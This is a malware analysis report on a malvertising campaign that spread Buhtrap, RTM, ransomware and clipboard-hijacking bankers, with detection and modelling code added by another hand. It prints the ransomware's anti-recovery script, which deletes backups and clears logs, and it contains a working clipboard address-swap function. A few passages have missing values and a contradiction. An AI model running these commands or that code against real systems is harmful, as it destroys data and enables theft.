Buhtrap backdoor and ransomware distributed via Yandex.Direct

    To target accountants, an attacker can use the working documents they search for online. Over the past few months a cybercrime group has been doing exactly that: it distributes the well-known Buhtrap and RTM backdoors, as well as ransomware and cryptocurrency-stealing software. Most targets are located in Russia. The attack is implemented by placing malicious ads in Yandex.Direct. Potential victims were taken to a site where they were asked to download a malicious file disguised as a document template. Yandex removed the malicious ads after our warning.

    The Buhtrap source code leaked online in the past, so anyone can use it. We have no information on whether the RTM code is available.

    In this post we describe how the attackers distributed malware via Yandex.Direct and hosted it on GitHub, followed by a technical analysis of the malware.

    Buhtrap and RTM back in business

    Distribution mechanism and victims

    The various payloads delivered to victims share a common distribution mechanism. All malicious files created by the attackers were hosted in two different GitHub repositories.

    Usually a repository contained a single downloadable malicious file, which changed frequently. Because GitHub keeps the commit history, we can see which malware was distributed during a given period. To convince victims to download the malicious file, the attackers used the site blanki-shabloni24[.]ru, shown in the figure above.

    The site design and all the malicious file names follow a single theme: forms, templates, contracts, samples and so on. Given that Buhtrap and RTM have already been used in attacks on accountants, we assumed the strategy is the same in the new campaign. The only question was how victims ended up on the attackers' site.


    At least some potential victims were brought to this site by malicious advertising. The following is an example URL (truncated):

    |{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&

    As can be seen from the link, the banner was placed on the legitimate accounting forum bb.f2[.]kz. It is important to note that the banners appeared on various sites, all of them had the same campaign id (blanki_rsya), and most of the sites related to accounting or legal services. The URL also shows that the potential victim used the search query “скачать бланк счета” (“download invoice form”), which supports our hypothesis of a targeted attack. Below are the sites on which the banners appeared, together with the associated search queries.

    • download invoice form - bb.f2[.]kz
    • sample contract - ipopen[.]ru
    • statement of claim sample - 77metrov[.]ru
    • contract form - blank-dogovor-kupli-prodazhi[.]ru
    • petition sample - [.]ru
    • sample complaint - yurday[.]ru
    • sample contract forms - regforum[.]ru
    • contract form - assistentus[.]ru
    • sample apartment agreement - napravah[.]com
    • samples of legal contracts - avito[.]ru

    The blanki-shabloni24[.]ru site was probably designed to pass a simple visual check. An ad that leads to a professional-looking site with a link to GitHub does not look obviously malicious. In addition, the attackers uploaded malicious files to the repository only for limited periods, probably for the duration of an ad campaign; most of the time the repository contained only an empty zip archive or a clean executable. Thus the attackers could distribute their ads through Yandex.Direct on sites most likely visited by accountants arriving via specific search queries.

    Next, consider the various payloads distributed in this way.

    Payload Analysis

    Distribution Timeline

    The malware campaign began at the end of October 2018 and was still active at the time of writing. Because the entire repository was publicly available on GitHub, we compiled an accurate timeline of the distribution of six different malware families (see the figure below). For comparison with the git history, we added a line showing when the banner link was first detected in ESET telemetry. As can be seen, this correlates well with the availability of the payload on GitHub. The discrepancy at the end of February is explained by our missing part of the change history: the repository was deleted from GitHub before we could retrieve it in full.

    Figure 1. Timeline of malware distribution.

    Code Signing Certificates

    The campaign used a number of code signing certificates. Some signed more than one malware family, which further indicates that the different samples belong to the same campaign. Despite having the private key, the operators did not sign binaries systematically and did not use the key for all samples. At the end of February 2019, the attackers began producing invalid signatures using a certificate owned by Google, for which they do not have the private key. Such signatures fail Authenticode verification, so the certificate subject alone should never be trusted without checking that the signature actually validates.

    All the certificates involved in the campaign and the malware families they sign are listed in the table below.

    We also used these code signing certificates to pivot to other malware families. For most certificates, we found no samples that were not distributed through the GitHub repository. However, the TOV “MARIYA” certificate was also used to sign malware belonging to the Wauchos botnet, adware and miners. That malware is unlikely to be associated with this campaign; most likely the certificate was bought on the darknet.

    Win32 / Filecoder.Buhtrap

    The first component that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. It is a Delphi binary, sometimes packed, distributed mainly in February–March 2019. It behaves as ransomware should: it enumerates local drives and network shares and encrypts the files it finds. It does not need an Internet connection to compromise a machine, as it does not contact a server to send the encryption keys. Instead, it appends a “token” to the end of the ransom note and suggests contacting the operators by email or Bitmessage.

    To encrypt as many valuable resources as possible, Filecoder.Buhtrap starts a thread that terminates key software that may hold open handles to files with valuable information, which would interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to hinder data recovery, wipes the RDP connection history and clears the Windows event logs. This is done by the batch script below:

    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    bcdedit /set {default} recoveryenabled no
    wbadmin delete catalog -quiet
    wbadmin delete systemstatebackup
    wbadmin delete systemstatebackup -keepversions:0
    wbadmin delete backup
    wmic shadowcopy delete
    vssadmin delete shadows /all /quiet
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
    attrib "%userprofile%\documents\Default.rdp" -s -h
    del "%userprofile%\documents\Default.rdp"
    wevtutil.exe clear-log Application
    wevtutil.exe clear-log Security
    wevtutil.exe clear-log System
    sc config eventlog start=disabled

    Filecoder.Buhtrap also uses the legitimate online service IP Logger, intended for collecting information about website visitors, to track the ransomware's victims. The following mshta command line is responsible for this (the IP Logger URL passed to document.write is not preserved in this copy):

    mshta.exe "javascript:document.write('');"
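To turn the script above into detection logic, the following Python example (added here, not part of the original report) matches each technique in the sequence against process-creation log lines and raises an alert only when one host trips several of them, since a lone vssadmin call can be legitimate administration. The log lines, the host names and the downloader file name in them are constructed, not taken from the campaign.

```python
"""Detect the recovery-inhibition and log-wiping sequence above in process-creation logs.
Added example, not from the original report. Log format (constructed, Sysmon Event ID 1
style): 'time|host|parent_image|command_line'."""
import re
from collections import defaultdict

# One rule per technique in the batch script; all matched case-insensitively.
RULES = [
    ("bcdedit: boot failures ignored", r"bcdedit\b.*\bbootstatuspolicy\s+ignoreallfailures"),
    ("bcdedit: recovery disabled",     r"bcdedit\b.*\brecoveryenabled\s+no\b"),
    ("wbadmin: backups deleted",       r"wbadmin\s+delete\s+(catalog|systemstatebackup|backup)\b"),
    ("shadow copies deleted",          r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"),
    ("RDP history wiped",              r"reg(\.exe)?\s+delete\s+\"?HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client"),
    ("event log cleared",              r"wevtutil(\.exe)?\s+(cl|clear-log)\s+(application|security|system)\b"),
    ("event log service disabled",     r"sc(\.exe)?\s+config\s+eventlog\s+start=\s*disabled"),
    ("mshta inline javascript",        r"mshta(\.exe)?\s+\"?javascript:"),
]
COMPILED = [(label, re.compile(rx, re.IGNORECASE)) for label, rx in RULES]

def classify(command_line):
    """Labels of every rule that the command line triggers."""
    return [label for label, rx in COMPILED if rx.search(command_line)]

def detect(log_text, threshold=3):
    """Alert per host when at least `threshold` distinct rules fire.
    A lone 'vssadmin delete shadows' may be admin work; the full sequence is not."""
    hits = defaultdict(dict)                      # host -> {label: (time, parent, cmd)}
    for line in log_text.strip().splitlines():
        time, host, parent, cmd = line.split("|", 3)
        for label in classify(cmd):
            hits[host].setdefault(label, (time, parent, cmd))
    return {host: h for host, h in hits.items() if len(h) >= threshold}

# Constructed sample: one infected workstation, one administrator doing routine work.
SAMPLE_LOG = r"""
2019-03-04T10:12:01Z|WS-ACC-07|C:\Users\olga\Downloads\blank_scheta.exe|cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
2019-03-04T10:12:01Z|WS-ACC-07|C:\Users\olga\Downloads\blank_scheta.exe|cmd.exe /c bcdedit /set {default} recoveryenabled no
2019-03-04T10:12:02Z|WS-ACC-07|C:\Users\olga\Downloads\blank_scheta.exe|wbadmin delete catalog -quiet
2019-03-04T10:12:02Z|WS-ACC-07|C:\Users\olga\Downloads\blank_scheta.exe|vssadmin delete shadows /all /quiet
2019-03-04T10:12:03Z|WS-ACC-07|C:\Users\olga\Downloads\blank_scheta.exe|reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
2019-03-04T10:12:03Z|WS-ACC-07|C:\Users\olga\Downloads\blank_scheta.exe|wevtutil.exe clear-log Security
2019-03-04T10:12:03Z|WS-ACC-07|C:\Users\olga\Downloads\blank_scheta.exe|sc config eventlog start=disabled
2019-03-04T10:12:04Z|WS-ACC-07|C:\Users\olga\Downloads\blank_scheta.exe|mshta.exe "javascript:document.write('');"
2019-03-04T11:00:00Z|WS-ADM-01|C:\Windows\System32\cmd.exe|vssadmin list shadows
2019-03-04T11:00:05Z|WS-ADM-01|C:\Windows\System32\cmd.exe|wevtutil qe Security /c:10
2019-03-04T11:30:00Z|WS-ADM-01|C:\Windows\System32\cmd.exe|vssadmin delete shadows /for=C: /oldest
"""

if __name__ == "__main__":
    for host, found in detect(SAMPLE_LOG).items():
        print(f"ALERT {host}: {len(found)} techniques")
        for label, (time, parent, cmd) in found.items():
            print(f"  {time} [{label}] {parent} -> {cmd}")
```

The threshold is what keeps the administrator's single shadow-copy deletion out of the alerts; the parent image in each hit (here a file from the Downloads folder) is the field to pivot on when the alert fires.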

    A file is encrypted only if it matches none of three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, any file whose full path contains one of the directory strings listed below is excluded. Third, certain file names are excluded, among them the name of the ransom note. Both lists are shown below. Clearly these exclusions are meant to keep the machine bootable, but only minimally usable.

    \tor browser\
    \opera software\
    \mozilla firefox\
    \internet explorer\
    \application data\
    \apple computer\safari\
    \all users\
    :\system volume information\

    your files are now encrypted.txt
    windows update assistant.lnk

    File encryption scheme

    Once launched, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and modulus), zlib-compressed and base64-encoded. The code responsible is shown in Figure 2.

    Figure 2. The result of Hex-Rays decompilation of the process of generating a 512-bit RSA key pair.

    The following is an example of the plaintext of a generated private key, i.e. the token appended to the ransom note.


    The attackers' public key is shown below.

    e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
    n = (the 2048-bit modulus is not reproduced in this copy)

    Files are encrypted with AES in CBC mode. For each encrypted file a new key and a new initialization vector are generated, and the key material is appended to the end of the encrypted file. (The original report describes this as AES-128-CBC with a 256-bit key; since AES-128 by definition uses a 128-bit key, the two figures are inconsistent, and one of them presumably refers to the 128-bit block size.) Consider the encrypted file format.

    Encrypted files have the following header (see the figure). The original file data, with the VEGA magic value prepended, is encrypted up to the first 0x5000 bytes. All information needed for decryption is appended to the file in the following structure:

    - a file size marker indicating whether the file is larger than 0x5000 bytes
    - AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
    - RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))

    Consequently, recovering a per-file AES key requires first recovering the generated RSA private key, which only the holder of the private half of the hard-coded key can do; the victim cannot decrypt anything offline.
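As an added worked example (not the malware's code, and not reproduced from the report), the following Python models the key hierarchy above: the per-victim 512-bit key wrapped under a hard-coded 2048-bit key, the per-file key wrapped under the per-victim public key, and the operator-side unwrapping chain a decryptor would follow. Everything the report does not specify is marked ASSUMPTION in the code: the RSA padding mode (textbook RSA is used), the exact trailer layout, and the symmetric cipher, for which a SHA-256 keystream stands in for AES-CBC so that the script runs with only the standard library.

```python
"""Model of the Filecoder.Buhtrap key hierarchy described above.
Added example, NOT the malware's code; stand-ins and guesses are marked ASSUMPTION.
`random` is fine for a model; it is not a CSPRNG."""
import base64, hashlib, os, random, struct, zlib

MAGIC, LIMIT = b"VEGA", 0x5000      # magic prefix; only the first 0x5000 bytes get encrypted

# --- textbook RSA. ASSUMPTION: the report does not state a padding mode; none is used here ---
_SMALL = [p for p in range(3, 1000, 2) if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]

def _probable_prime(n, rounds=16):
    for p in _SMALL:                             # trial division, then Miller-Rabin
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def rsa_keygen(bits, e=65537):
    """Return ((e, n), (d, n)) with an n of exactly `bits` bits."""
    def prime(b):
        while True:
            c = random.getrandbits(b) | (1 << (b - 1)) | 1
            if _probable_prime(c):
                return c
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and n.bit_length() == bits and phi % e:
            return (e, n), (pow(e, -1, phi), n)

def rsa_encrypt(data, pub):
    e, n = pub
    m = int.from_bytes(data, "big")
    assert m < n
    return pow(m, e, n).to_bytes((n.bit_length() + 7) // 8, "big")

def rsa_decrypt(ct, priv, out_len):
    d, n = priv
    return pow(int.from_bytes(ct, "big"), d, n).to_bytes(out_len, "big")

def stream_xor(key, iv, data):
    """ASSUMPTION / STAND-IN for AES-CBC (no third-party library): SHA-256 counter keystream."""
    out = bytearray()
    for i in range(0, len(data), 32):
        ks = hashlib.sha256(key + iv + struct.pack(">I", i // 32)).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], ks))
    return bytes(out)

def wrap_victim_key(victim_priv, operator_pub):
    """RSA key blob: zlib(RSA_operator(d || n)); base64 of this is the ransom-note token."""
    d, n = victim_priv
    return zlib.compress(rsa_encrypt(d.to_bytes(64, "big") + n.to_bytes(64, "big"), operator_pub))

def unwrap_victim_key(blob, operator_priv):
    raw = rsa_decrypt(zlib.decompress(blob), operator_priv, 128)
    return int.from_bytes(raw[:64], "big"), int.from_bytes(raw[64:], "big")

def encrypt_file(plaintext, victim_pub, rsa_blob):
    key, iv = os.urandom(32), os.urandom(16)                # fresh key and IV per file
    body = MAGIC + plaintext
    enc = stream_xor(key, iv, body[:LIMIT]) + body[LIMIT:]
    key_blob = zlib.compress(rsa_encrypt(key + iv, victim_pub))
    # ASSUMPTION: the exact trailer layout is not reproduced in the report; lengths are stored last here
    return enc + key_blob + rsa_blob + struct.pack("<?II", len(body) > LIMIT, len(key_blob), len(rsa_blob))

def decrypt_file(blob, operator_priv):
    """Operator side: trailer -> victim private key -> per-file key -> plaintext."""
    big, klen, rlen = struct.unpack("<?II", blob[-9:])
    enc, key_blob, rsa_blob = blob[:-9 - klen - rlen], blob[-9 - klen - rlen:-9 - rlen], blob[-9 - rlen:-9]
    kv = rsa_decrypt(zlib.decompress(key_blob), unwrap_victim_key(rsa_blob, operator_priv), 48)
    body = stream_xor(kv[:32], kv[32:], enc[:LIMIT]) + enc[LIMIT:]
    assert body.startswith(MAGIC) and big == (len(body) > LIMIT)
    return body[len(MAGIC):]

def demo(plaintext=b"invoice " * 0x1000):
    operator_pub, operator_priv = rsa_keygen(2048)  # hard-coded in the real sample
    victim_pub, victim_priv = rsa_keygen(512)       # generated at launch, per infection
    rsa_blob = wrap_victim_key(victim_priv, operator_pub)
    token = base64.b64encode(rsa_blob).decode()     # what the ransom note carries
    return decrypt_file(encrypt_file(plaintext, victim_pub, rsa_blob), operator_priv) == plaintext, token
```

demo() returns whether the round trip succeeded and the base64 token that would land in the ransom note. The point to notice is the order of operations in decrypt_file: the per-file key can only be unwrapped after the per-victim private key has been unwrapped with the operators' private key, which is why the scheme needs no network contact at encryption time and why the victim cannot decrypt without the operators.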

    Win32 / ClipBanker

    Win32/ClipBanker is a component that was distributed intermittently from late October to early December 2018. Its role is to monitor the contents of the clipboard, looking for cryptocurrency wallet addresses. When it finds a target wallet address, ClipBanker replaces it with an address presumably belonging to the operators. The samples we studied were neither packed nor obfuscated; the only mechanism used to hide behaviour is string encryption. The operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

    During the period the malware was distributed, only a small amount of bitcoin was sent to the attackers' wallets, which casts doubt on the success of the campaign. Moreover, there is no reason to assume that these transactions were related to ClipBanker at all.

    Win32 / RTM

    The Win32/RTM component was distributed for several days in early March 2019. RTM is a Delphi-based banking trojan targeting remote banking systems. In 2017, ESET researchers published a detailed analysis of this malware, and that description is still relevant. In January 2019, Palo Alto Networks also published a blog post about RTM.

    Buhtrap downloader

    For some time, a downloader unlike previous Buhtrap tools was available on GitHub. It contacts https://94.100.18[.]67/RSS.php? to fetch the next stage and loads it directly into memory. Two behaviours of the second-stage code can be distinguished. In the first, the RSS.php URL served the Buhtrap backdoor directly; this backdoor is very similar to the one available since the source code leak. Interestingly, we see several campaigns using the Buhtrap backdoor, presumably run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with DLL deployment that we described earlier. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server; in most of the campaigns we have seen, operators did not bother to change this key.

    The second, more complex behaviour: the RSS.php URL served another loader. It implements some obfuscation, such as rebuilding the import table dynamically. The purpose of this loader is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we saw when running this loader was the same Buhtrap backdoor, but there may be other components.

    Android / Spy.Banker

    Interestingly, an Android component was also found in the GitHub repository. It was in the main branch for only one day, November 1, 2018. Apart from being hosted on GitHub, ESET telemetry shows no evidence of this malware being distributed.

    The component was hosted as an Android Application Package (APK). It is heavily obfuscated. The malicious behaviour is hidden in an encrypted JAR inside the APK, located at APK_ROOT + image/files. The first 4 bytes of the file contain the length of the encrypted JAR, which begins immediately after the length field. The JAR is RC4-enc RC4-encrypted using the key below; the same key and algorithm are used to encrypt strings:

    key = [
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
    ]

    Having decrypted the file, we found that it is Anubis, a previously documented Android banker. The malware has the following capabilities:

    • microphone recording
    • taking screenshots
    • obtaining GPS coordinates
    • keylogging
    • device data encryption and ransom demand
    • spamming
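The unpacking step for the APK, as an added example (not the sample's own code and not from the report): parse the 4-byte length field, RC4-decrypt the following bytes with the key above, and sanity-check the result as a ZIP/JAR before going further. The byte order of the length field is not stated in the report and is assumed to be little-endian here; the embedded JAR is constructed so that the script runs offline.

```python
"""Unpack the encrypted JAR carried by the Android/Spy.Banker APK: a 4-byte length field
followed by the RC4-encrypted JAR. Added example, not from the original report.
ASSUMPTION: the byte order of the length field is not stated; little-endian is used here."""
import io
import struct
import zipfile

KEY = bytes([                      # RC4 key as listed in the report
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96])

def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def unpack_jar(blob, key=KEY):
    """Parse 'length || RC4(jar)' and return the decrypted JAR bytes; raise on any mismatch."""
    (length,) = struct.unpack("<I", blob[:4])
    if length > len(blob) - 4:
        raise ValueError(f"length field {length} exceeds payload ({len(blob) - 4} bytes)")
    jar = rc4(key, blob[4:4 + length])
    if jar[:2] != b"PK":           # a JAR is a ZIP; check the local-file-header magic
        raise ValueError("decrypted data is not a ZIP/JAR: wrong key or byte order?")
    return jar

def decrypt_string(key, enc):
    """Strings in the sample use the same key and algorithm."""
    return rc4(key, enc).decode()

def list_entries(jar_bytes):
    return zipfile.ZipFile(io.BytesIO(jar_bytes)).namelist()

def build_sample():
    """Constructed stand-in for image/files: a tiny JAR, RC4-encrypted, length-prefixed,
    with trailing bytes after the payload so that the length field actually matters."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"dex\n035\0constructed placeholder")
    jar = buf.getvalue()
    return struct.pack("<I", len(jar)) + rc4(KEY, jar) + b"\0" * 16

if __name__ == "__main__":
    print(list_entries(unpack_jar(build_sample())))
```

If the "PK" check fails on a real sample, try the other byte order for the length field before suspecting the key; the length check above also catches a truncated dump early.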

    Interestingly, the banker uses Twitter as a backup channel to obtain another C&C server. The sample we analysed used the @JohnesTrader account, which had already been suspended at the time of analysis.

    The banker contains a list of targeted applications on the Android device. It is longer than the list obtained in the Sophos study. The list includes many banking applications, online shopping apps such as Amazon and eBay, and cryptocurrency services.

    MSIL / ClipBanker.IH

    The last component distributed as part of this campaign was a .NET Windows executable, which appeared in March 2019. Most of the versions we studied were packed with ConfuserEx v1.0.0. Like ClipBanker, this component monitors the clipboard. It targets a wide range of cryptocurrencies, as well as Steam trade offers. In addition, it uses the IP Logger service to steal Bitcoin private keys in WIF format.

    Protection Mechanisms

    In addition to the anti-debugging, anti-dumping and anti-tampering protection that ConfuserEx provides, the component can detect antivirus products and virtual machines.

    To check whether it is running in a virtual machine, the malware uses the Windows built-in WMI command-line tool (WMIC) to query BIOS information:

    wmic bios

    It then parses the command output and searches for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

    To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using the ManagementObjectSearcher API, as shown below. After base64 decoding, the call looks like this:

    ManagementObjectSearcher('root\\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

    Figure 3. The process of determining anti-virus products.

    In addition, the malware checks whether CryptoClipWatcher, a tool for protecting against clipboard attacks, is running and, if so, suspends all threads of that process, thereby disabling the protection.


    The version of the malware we studied copies itself to %APPDATA%\google\updater.exe and sets the “hidden” attribute on the google directory. It then modifies the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell value in the Windows registry, appending the path to updater.exe, so the malware runs every time a user logs in. Any Winlogon\Shell value other than explorer.exe is a reliable persistence indicator and is easy to audit.

    Malicious behavior

    Like ClipBanker, the malware monitors the clipboard for cryptocurrency wallet addresses and, when it finds one, replaces it with one of the operator's addresses. Below is a list of destination addresses found in the code.


    Each address type has a corresponding regular expression. The STEAM_URL entry is used to attack Steam, as can be seen from the regular expression used to detect it in the clipboard:


    Exfiltration channel

    In addition to replacing addresses in the clipboard, the malware targets the WIF private keys of Bitcoin, Bitcoin Core and Electrum wallets. It uses IP Logger as the exfiltration channel for the WIF private key: the operators place the private key data in the User-Agent HTTP header, as shown below.

    Figure 4. IP Logger console with output.

    The operators did not use IP Logger to exfiltrate wallet files. They probably resorted to a different method because of the 255-character limit of the User-Agent field displayed in the IP Logger web interface. In the samples we studied, the other exfiltration server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not set anywhere in the code, which suggests that the malware is still under development and the variable is set on the operator's test machine.
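As an added example covering both the clipboard replacement described above and the User-Agent exfiltration channel (not the malware's code; the regular expressions, wallet addresses, host names and log lines are all assumptions or constructed placeholders, not the sample's own), the following Python shows the per-currency patterns such a component needs, the swap itself, a CryptoClipWatcher-style guard that compares the copied and pasted address, and a proxy-log check for WIF-shaped keys in User-Agent headers.

```python
"""Clipboard-hijack address patterns and the User-Agent exfiltration check.
Added example, not the malware's code. All regexes, wallet addresses and log lines are
ASSUMPTIONS / constructed placeholders, not the sample's patterns or the operators' wallets."""
import re

B58 = r"[1-9A-HJ-NP-Za-km-z]"                       # Base58 alphabet (no 0, O, I, l)
PATTERNS = {                                          # shape checks only, no checksum
    "BTC": rf"\b(?:bc1[ac-hj-np-z02-9]{{25,59}}|[13]{B58}{{25,34}})\b",
    "BCH": r"\b(?:bitcoincash:)?[qp][a-z0-9]{41}\b",
    "ETH": r"\b0x[0-9a-fA-F]{40}\b",
    "XRP": rf"\br{B58}{{24,34}}\b",
    "DOGE": rf"\bD[5-9A-HJ-NP-U]{B58}{{32}}\b",
    "STEAM_URL": r"https://steamcommunity\.com/tradeoffer/new/\?partner=\d+&token=[A-Za-z0-9_-]+",
}
COMPILED = {kind: re.compile(rx) for kind, rx in PATTERNS.items()}
WIF = re.compile(rf"\b(?:5[HJK]{B58}{{49}}|[KL]{B58}{{51}})\b")   # Bitcoin private key, WIF

# Constructed placeholder addresses (not real wallets).
OPERATOR = {
    "BTC": "1Hijack9ReceiverAddressForDemo2345",
    "BCH": "q" + "h" * 41,
    "ETH": "0x" + "cd34" * 10,
    "XRP": "r" + "HijackXRP" * 3,
    "DOGE": "D5" + "Hijack" * 5 + "99",
    "STEAM_URL": "https://steamcommunity.com/tradeoffer/new/?partner=987654321&token=zyxwVUTS",
}
VICTIM = {
    "BTC": "1VictimTrueAddressForDemo987654321",
    "ETH": "0x" + "ab12" * 10,
    "STEAM_URL": "https://steamcommunity.com/tradeoffer/new/?partner=123456789&token=abcdEFGH",
}

def find_addresses(text):
    """(kind, token) for every address-like token in a clipboard text, in pattern order."""
    return [(kind, m.group(0)) for kind, rx in COMPILED.items() for m in rx.finditer(text)]

def hijack(clipboard, operator=OPERATOR):
    """Model of the malicious swap: every recognised address becomes the operator's."""
    for kind, rx in COMPILED.items():
        clipboard = rx.sub(lambda m, k=kind: operator[k], clipboard)
    return clipboard

def clipboard_guard(copied, pasted):
    """CryptoClipWatcher-style check: what gets pasted must be what the user copied."""
    return find_addresses(copied) == find_addresses(pasted)

def scan_proxy_log(lines):
    """Flag requests whose User-Agent carries a WIF-shaped key (log format: 'host|dest|ua')."""
    alerts = []
    for line in lines:
        host, dest, ua = line.split("|", 2)
        m = WIF.search(ua)
        if m:
            alerts.append((host, dest, m.group(0)))
    return alerts

FAKE_WIF = "5K" + "PrivateKeyDemo" * 3 + "1234567"          # 51 chars, WIF-shaped, not a real key
SAMPLE_CLIPBOARD = (f"Pay 0.5 BTC to {VICTIM['BTC']} or ETH to {VICTIM['ETH']}; "
                    f"trade offer: {VICTIM['STEAM_URL']}")
SAMPLE_PROXY_LOG = [                                         # constructed
    "WS-ACC-07|logger.example|Mozilla/5.0 " + FAKE_WIF,
    "WS-ACC-07|update.microsoft.com|Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "WS-ACC-09|github.com|git/2.20.1",
]

if __name__ == "__main__":
    swapped = hijack(SAMPLE_CLIPBOARD)
    print("pasted:", swapped)
    print("guard passes:", clipboard_guard(SAMPLE_CLIPBOARD, swapped))
    print("exfil alerts:", scan_proxy_log(SAMPLE_PROXY_LOG))
```

The patterns are deliberately shape-only (no Base58 checksum), which is enough to catch the swap but will occasionally flag long Base58-looking tokens; in a real deployment, pair the User-Agent rule with the destination host, and note that the 255-character limit mentioned above does not help here, since a WIF key is only 51 or 52 characters.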

    There is another sign that the program is under development. The binary contains two URLs, and a request is sent to both when exfiltrating data. In the request to one of them, the value of the Referer field is prefixed with “DEV /”. We also found a version that was not packed with ConfuserEx, in which the field holding this URL is named DevFeedbackUrl. Based on the name of the environment variable, we believe the operators plan to use the legitimate Discord service and its webhook mechanism to exfiltrate cryptocurrency wallets.


    This campaign is an example of the use of legitimate advertising services in cyberattacks. The scheme targets Russian organisations, but we would not be surprised to see such an attack using non-Russian services. To avoid compromise, users must verify the reputation of the source of any software they download.

    A complete list of indicators of compromise and MITRE ATT&CK techniques is available here.
